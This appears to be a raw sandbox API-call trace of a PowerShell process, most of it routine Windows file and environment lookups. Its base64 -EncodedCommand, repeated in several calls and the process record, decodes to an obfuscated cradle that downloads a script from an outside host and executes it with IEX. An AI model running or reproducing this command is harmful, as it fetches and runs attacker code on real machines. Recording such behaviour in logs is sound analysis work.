	[0440.278] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\powershell.BAT", lpFindFileData=0x1c80db40 | out: lpFindFileData=0x1c80db40*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0440.278] SetErrorMode (uMode=0x1) returned 0x1
	[0440.278] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x1c80d9a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18
	[0440.278] SetErrorMode (uMode=0x1) returned 0x1
	[0440.279] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\powershell.CMD", lpFindFileData=0x1c80db40 | out: lpFindFileData=0x1c80db40*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0440.279] SetErrorMode (uMode=0x1) returned 0x1
	[0440.279] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x1c80d9a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18
	[0440.279] SetErrorMode (uMode=0x1) returned 0x1
	[0440.279] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\powershell.VBS", lpFindFileData=0x1c80db40 | out: lpFindFileData=0x1c80db40*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0440.279] SetErrorMode (uMode=0x1) returned 0x1
	[0440.280] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x1c80d9a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18
	[0440.280] SetErrorMode (uMode=0x1) returned 0x1
	[0440.280] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\powershell.VBE", lpFindFileData=0x1c80db40 | out: lpFindFileData=0x1c80db40*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0440.280] SetErrorMode (uMode=0x1) returned 0x1
	[0440.280] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x1c80d9a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18
	[0440.280] SetErrorMode (uMode=0x1) returned 0x1
	[0440.281] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\powershell.JS", lpFindFileData=0x1c80db40 | out: lpFindFileData=0x1c80db40*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0440.281] SetErrorMode (uMode=0x1) returned 0x1
	[0440.281] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x1c80d9a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18
	[0440.281] SetErrorMode (uMode=0x1) returned 0x1
	[0440.281] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\powershell.JSE", lpFindFileData=0x1c80db40 | out: lpFindFileData=0x1c80db40*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0440.282] SetErrorMode (uMode=0x1) returned 0x1
	[0440.517] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x1c80d9a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18
	[0440.517] SetErrorMode (uMode=0x1) returned 0x1
	[0440.518] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\powershell.WSF", lpFindFileData=0x1c80db40 | out: lpFindFileData=0x1c80db40*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0440.518] SetErrorMode (uMode=0x1) returned 0x1
	[0440.518] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x1c80d9a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18
	[0440.518] SetErrorMode (uMode=0x1) returned 0x1
	[0440.519] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\powershell.WSH", lpFindFileData=0x1c80db40 | out: lpFindFileData=0x1c80db40*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0440.519] SetErrorMode (uMode=0x1) returned 0x1
	[0440.519] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x1c80d9a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18
	[0440.519] SetErrorMode (uMode=0x1) returned 0x1
	[0440.519] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\powershell.MSC", lpFindFileData=0x1c80db40 | out: lpFindFileData=0x1c80db40*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0440.520] SetErrorMode (uMode=0x1) returned 0x1
	[0440.520] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x1c80d9a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18
	[0440.520] SetErrorMode (uMode=0x1) returned 0x1
	[0440.520] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\powershell", lpFindFileData=0x1c80db40 | out: lpFindFileData=0x1c80db40*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0440.520] SetErrorMode (uMode=0x1) returned 0x1
	[0440.520] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c80d9a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x2b
	[0440.521] SetErrorMode (uMode=0x1) returned 0x1
	[0440.521] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.ps1", lpFindFileData=0x1c80db40 | out: lpFindFileData=0x1c80db40*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0440.521] SetErrorMode (uMode=0x1) returned 0x1
	[0440.521] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c80d9a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x2b
	[0440.521] SetErrorMode (uMode=0x1) returned 0x1
	[0440.522] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.psm1", lpFindFileData=0x1c80db40 | out: lpFindFileData=0x1c80db40*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0440.522] SetErrorMode (uMode=0x1) returned 0x1
	[0440.522] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c80d9a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x2b
	[0440.522] SetErrorMode (uMode=0x1) returned 0x1
	[0440.522] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.psd1", lpFindFileData=0x1c80db40 | out: lpFindFileData=0x1c80db40*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0440.523] SetErrorMode (uMode=0x1) returned 0x1
	[0440.523] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c80d9a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x2b
	[0440.523] SetErrorMode (uMode=0x1) returned 0x1
	[0440.523] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.COM", lpFindFileData=0x1c80db40 | out: lpFindFileData=0x1c80db40*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0440.523] SetErrorMode (uMode=0x1) returned 0x1
	[0440.523] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c80d9a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x2b
	[0440.524] SetErrorMode (uMode=0x1) returned 0x1
	[0440.524] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.EXE", lpFindFileData=0x1c80db40 | out: lpFindFileData=0x1c80db40*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x82dd7f7c, ftCreationTime.dwHighDateTime=0x1ca0414, ftLastAccessTime.dwLowDateTime=0x82dd7f7c, ftLastAccessTime.dwHighDateTime=0x1ca0414, ftLastWriteTime.dwLowDateTime=0xe84fc9b0, ftLastWriteTime.dwHighDateTime=0x1ca0423, nFileSizeHigh=0x0, nFileSizeLow=0x73a00, dwReserved0=0x0, dwReserved1=0x0, cFileName="powershell.exe", cAlternateFileName="")) returned 0x48d110
	[0440.525] FindNextFileW (in: hFindFile=0x48d110, lpFindFileData=0x1c80db50 | out: lpFindFileData=0x1c80db50*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x82dd7f7c, ftCreationTime.dwHighDateTime=0x1ca0414, ftLastAccessTime.dwLowDateTime=0x82dd7f7c, ftLastAccessTime.dwHighDateTime=0x1ca0414, ftLastWriteTime.dwLowDateTime=0xe84fc9b0, ftLastWriteTime.dwHighDateTime=0x1ca0423, nFileSizeHigh=0x0, nFileSizeLow=0x73a00, dwReserved0=0x0, dwReserved1=0x0, cFileName="powershell.exe", cAlternateFileName="")) returned 0
	[0440.525] FindClose (in: hFindFile=0x48d110 | out: hFindFile=0x48d110) returned 1
	[0440.525] SetErrorMode (uMode=0x1) returned 0x1
	[0440.526] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", nBufferLength=0x105, lpBuffer=0x1c80dc60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", lpFilePart=0x0) returned 0x39
	[0440.526] SetErrorMode (uMode=0x1) returned 0x1
	[0440.526] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\powershell.exe"), fInfoLevelId=0x0, lpFileInformation=0x1c80de70 | out: lpFileInformation=0x1c80de70*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x82dd7f7c, ftCreationTime.dwHighDateTime=0x1ca0414, ftLastAccessTime.dwLowDateTime=0x82dd7f7c, ftLastAccessTime.dwHighDateTime=0x1ca0414, ftLastWriteTime.dwLowDateTime=0xe84fc9b0, ftLastWriteTime.dwHighDateTime=0x1ca0423, nFileSizeHigh=0x0, nFileSizeLow=0x73a00)) returned 1
	[0440.527] SetErrorMode (uMode=0x1) returned 0x1
	[0440.528] CoTaskMemAlloc (cb=0x104) returned 0x49d9f0
	[0440.528] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x49d9f0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0440.528] CoTaskMemFree (pv=0x49d9f0) 
	[0440.529] CoTaskMemAlloc (cb=0x104) returned 0x49d9f0
	[0440.529] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x49d9f0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0440.529] CoTaskMemFree (pv=0x49d9f0) 
	[0440.533] CoTaskMemAlloc (cb=0x104) returned 0x49d9f0
	[0440.533] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x49d9f0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0440.533] CoTaskMemFree (pv=0x49d9f0) 
	[0440.542] CoTaskMemAlloc (cb=0x104) returned 0x49d9f0
	[0440.542] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x49d9f0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0440.542] CoTaskMemFree (pv=0x49d9f0) 
	[0440.555] CoTaskMemAlloc (cb=0x3b) returned 0x1b850a20
	[0440.556] SHGetFileInfoA (in: pszPath="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", dwFileAttributes=0x0, psfi=0x1c80e058, cbFileInfo=0x168, uFlags=0x2000 | out: psfi=0x1c80e058) returned 0x4550
	[0440.752] CoTaskMemFree (pv=0x1b850a20) 
	[0440.755] GetConsoleWindow () returned 0x102b0
	[0440.762] CoTaskMemAlloc (cb=0x104) returned 0x49d9f0
	[0440.762] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x49d9f0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0440.763] CoTaskMemFree (pv=0x49d9f0) 
	[0440.764] CoTaskMemAlloc (cb=0x104) returned 0x49d9f0
	[0440.764] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x49d9f0, nSize=0x80 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35
	[0440.764] CoTaskMemFree (pv=0x49d9f0) 
	[0440.770] CoTaskMemAlloc (cb=0x104) returned 0x49d9f0
	[0440.770] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x49d9f0, nSize=0x80 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35
	[0440.770] CoTaskMemFree (pv=0x49d9f0) 
	[0440.772] CommandLineToArgvW (in: lpCmdLine=" -EncodedCommand JABwAGEAdABoACAAPQAgACcALwBmAGEAeAAuAHAAaABwAD8AaQBkAD0AYQBkAG0AaQBuACcAOwAgACQAaABvAHMAdABuAGEAbQBlACAAPQAgACcAegBhAHIAYQB0AG8AbwBuAHMALgBpAG4AZgBvACcAOwAgAEkAJwAnAEUAJwAnAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBjAGwAaQBlAG4AdAApAC4AZABvAHcAbgBsAG8AYQBkAHMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AJwAgACsAIAAkAGgAbwBzAHQAbgBhAG0AZQAgACsAIAAkAHAAYQB0AGgAKQA7AA==", pNumArgs=0x1c80e0a0 | out: pNumArgs=0x1c80e0a0) returned 0x1b858690*=""
	[0440.773] lstrlenW (lpString="-EncodedCommand") returned 15
	[0440.774] CoTaskMemAlloc (cb=0x22) returned 0x1b84b210
	[0440.774] RtlMoveMemory (in: Destination=0x1b84b210, Source=0x1b8586b2, Length=0x20 | out: Destination=0x1b84b210) 
	[0440.774] CoTaskMemFree (pv=0x1b84b210) 
	[0440.774] lstrlenW (lpString="JABwAGEAdABoACAAPQAgACcALwBmAGEAeAAuAHAAaABwAD8AaQBkAD0AYQBkAG0AaQBuACcAOwAgACQAaABvAHMAdABuAGEAbQBlACAAPQAgACcAegBhAHIAYQB0AG8AbwBuAHMALgBpAG4AZgBvACcAOwAgAEkAJwAnAEUAJwAnAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBjAGwAaQBlAG4AdAApAC4AZABvAHcAbgBsAG8AYQBkAHMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AJwAgACsAIAAkAGgAbwBzAHQAbgBhAG0AZQAgACsAIAAkAHAAYQB0AGgAKQA7AA==") returned 376
	[0440.774] CoTaskMemAlloc (cb=0x2f4) returned 0x1b8589d0
	[0440.774] RtlMoveMemory (in: Destination=0x1b8589d0, Source=0x1b8586d2, Length=0x2f2 | out: Destination=0x1b8589d0) 
	[0440.774] CoTaskMemFree (pv=0x1b8589d0) 
	[0440.775] LocalFree (hMem=0x1b858690) returned 0x0
	[0440.776] CoTaskMemAlloc (cb=0x804) returned 0x1b858690
	[0440.776] GetConsoleTitleW (in: lpConsoleTitle=0x1b858690, nSize=0x400 | out: lpConsoleTitle="Administrator: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe") returned 0x48
	[0440.777] CoTaskMemFree (pv=0x1b858690) 
	[0440.786] CoTaskMemAlloc (cb=0x38e) returned 0x1b858690
	[0440.786] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="\"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"  -EncodedCommand JABwAGEAdABoACAAPQAgACcALwBmAGEAeAAuAHAAaABwAD8AaQBkAD0AYQBkAG0AaQBuACcAOwAgACQAaABvAHMAdABuAGEAbQBlACAAPQAgACcAegBhAHIAYQB0AG8AbwBuAHMALgBpAG4AZgBvACcAOwAgAEkAJwAnAEUAJwAnAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBjAGwAaQBlAG4AdAApAC4AZABvAHcAbgBsAG8AYQBkAHMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AJwAgACsAIAAkAGgAbwBzAHQAbgBhAG0AZQAgACsAIAAkAHAAYQB0AGgAKQA7AA==", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x0, lpEnvironment=0x0, lpCurrentDirectory="C:\\Windows\\system32", lpStartupInfo=0x1c80e000*(cb=0x68, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x36da8d0 | out: lpCommandLine="\"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"  -EncodedCommand JABwAGEAdABoACAAPQAgACcALwBmAGEAeAAuAHAAaABwAD8AaQBkAD0AYQBkAG0AaQBuACcAOwAgACQAaABvAHMAdABuAGEAbQBlACAAPQAgACcAegBhAHIAYQB0AG8AbwBuAHMALgBpAG4AZgBvACcAOwAgAEkAJwAnAEUAJwAnAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBjAGwAaQBlAG4AdAApAC4AZABvAHcAbgBsAG8AYQBkAHMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AJwAgACsAIAAkAGgAbwBzAHQAbgBhAG0AZQAgACsAIAAkAHAAYQB0AGgAKQA7AA==", lpProcessInformation=0x36da8d0*(hProcess=0x3a8, hThread=0x3a4, dwProcessId=0x16a4, dwThreadId=0x16a8)) returned 1
	[0441.098] CoTaskMemFree (pv=0x1b858690) 
	[0441.099] CloseHandle (hObject=0x3a4) returned 1
	[0441.099] CoTaskMemAlloc (cb=0x3b) returned 0x1b850a20
	[0441.099] SHGetFileInfoA (in: pszPath="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", dwFileAttributes=0x0, psfi=0x1c80e0a8, cbFileInfo=0x168, uFlags=0x2000 | out: psfi=0x1c80e0a8) returned 0x4550
	[0441.100] CoTaskMemFree (pv=0x1b850a20) 
	[0441.103] GetCurrentProcess () returned 0xffffffffffffffff
	[0441.103] GetCurrentProcess () returned 0xffffffffffffffff
	[0441.104] DuplicateHandle (in: hSourceProcessHandle=0xffffffffffffffff, hSourceHandle=0x3a8, hTargetProcessHandle=0xffffffffffffffff, lpTargetHandle=0x1c80e188, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x1c80e188*=0x3a4) returned 1

Process:
	id = "31"
	image_name = "powershell.exe"
	filename = "c:\\windows\\system32\\windowspowershell\\v1.0\\powershell.exe"
	page_root = "0x28ec9000"
	os_pid = "0x998"
	os_integrity_level = "0x3000"
	os_privileges = "0x60800000"
	monitor_reason = "child_process"
	parent_id = "1"
	os_parent_pid = "0xb40"
	cmd_line = "\"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" powershell -EncodedCommand JABwAGEAdABoACAAPQAgACcALwBmAGEAeAAuAHAAaABwAD8AaQBkAD0AYQBkAG0AaQBuACcAOwAgACQAaABvAHMAdABuAGEAbQBlACAAPQAgACcAegBhAHIAYQB0AG8AbwBuAHMALgBpAG4AZgBvACcAOwAgAEkAJwAnAEUAJwAnAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBjAGwAaQBlAG4AdAApAC4AZABvAHcAbgBsAG8AYQBkAHMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AJwAgACsAIAAkAGgAbwBzAHQAbgBhAG0AZQAgACsAIAAkAHAAYQB0AGgAKQA7AA=="
	cur_dir = "C:\\Windows\\system32\\"
	os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz"
	bitness = "64"
	os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e9ce" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7]


Thread:
	id = 169
	os_tid = 0xa44

	[0377.506] CoInitializeEx (pvReserved=0x0, dwCoInit=0x0) returned 0x0
	[0378.938] SysStringByteLen (bstr="Microsoft.PowerShell.ConsoleHost, Version=1.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35, ProcessorArchitecture=msil") returned 0xfe
	[0378.938] SysStringByteLen (bstr="Microsoft.PowerShell.ConsoleHost, Version=1.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35, ProcessorArchitecture=msil") returned 0xfe
	[0378.938] SysStringByteLen (bstr="Microsoft.PowerShell.UnmanagedPSEntry") returned 0x4a
	[0378.938] SysStringByteLen (bstr="Microsoft.PowerShell.UnmanagedPSEntry") returned 0x4a
	[0382.807] GetVersionExW (in: lpVersionInformation=0x20dce0*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x20dce0*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
	[0382.809] GetVersionExW (in: lpVersionInformation=0x20dce0*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x20dce0*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
	[0382.816] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x20d900, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
